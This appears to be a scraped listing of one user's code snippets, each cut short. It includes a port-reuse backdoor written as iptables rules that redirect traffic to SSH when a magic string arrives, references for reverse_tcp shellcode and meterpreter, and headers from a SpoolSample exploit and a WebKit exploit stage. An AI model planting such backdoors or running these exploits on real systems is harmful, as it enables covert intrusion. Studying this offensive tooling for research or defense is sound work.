Dliv3

import os
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer

def main():
    # Instantiate a dummy authorizer for managing 'virtual' users
    authorizer = DummyAuthorizer()

    # Define a new user having full r/w permissions and a read-only

Dliv3

# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
#    python simple-https-server.py
# then in your browser, visit:
#    https://localhost:4443

import BaseHTTPServer, SimpleHTTPServer
import ssl

Dliv3

; reverse_tcp shellcode: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_recv.asm
; asm_block_api for windows x86: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/block_api.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
; hash算法&预定义好的各种函数的hash值: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
; PE结构: https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format
;《0day安全：软件漏洞分析技术》92页
; https://blog.cob

Dliv3

; meterpreter部分
; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/meterpreter_loader.rb
; https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reflectivedllinject.rb
; http://imosin.com/2017/12/22/meterpreter-think/
; https://www.freebuf.com/articles/system/53818.html
; https://bbs.pediy.com/thread-247616.htm

003d0000 4d              dec     ebp                    ; M
003d0001 5a              pop     edx                    ; Z
003d0002 e800000000      call    003d0007               

Dliv3

# -*- coding: utf-8 -*-
# https://github.com/jhao104/proxy_pool
import requests
import time

def get_proxy():
    return requests.get("http://127.0.0.1:5010/get/").content

def delete_proxy(proxy):
    requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))

Dliv3

# https://www.freebuf.com/articles/network/137683.html

# 端口复用链
iptables -t nat -N LETMEIN
# 端口复用规则
iptables -t nat  -A LETMEIN -p tcp -j REDIRECT --to-port 22

# 开启开关
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# 关闭开关

Dliv3

diff -Naur qemu-2.7.0.orig/cpu-exec.c qemu-2.7.0/cpu-exec.c
--- qemu-2.7.0.orig/cpu-exec.c	2016-09-02 17:34:17.000000000 +0200
+++ qemu-2.7.0/cpu-exec.c	2017-01-19 09:34:00.817088525 +0100
@@ -33,6 +33,9 @@
 #include "hw/i386/apic.h"
 #endif
 #include "sysemu/replay.h"
+#include "syscall_defs.h"
+
+extern int do_nx;

Dliv3

#!/usr/bin/env python

# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/

import os
import sys
import argparse
import binascii
import ConfigParser

Dliv3

// a bit more annotated stage2 (from fakeobj/addrof to rw)
// source: https://github.com/phoenhex/files/blob/master/exploits/ios-11.3.1/pwn_i8.js

// useful resources:
// webkit sources, lol
// http://phrack.org/papers/attacking_javascript_engines.html -- bit outdated -- info about spectre mitigations/gigacage is missing
// https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/ -- tldr on gigacage

// thx _niklasb

Dliv3

#!/bin/bash

input=$1
output=$2

echo "[*] decompiling jars in $input to $output ..."

input_jar=`ls $input`

for i in $input_jar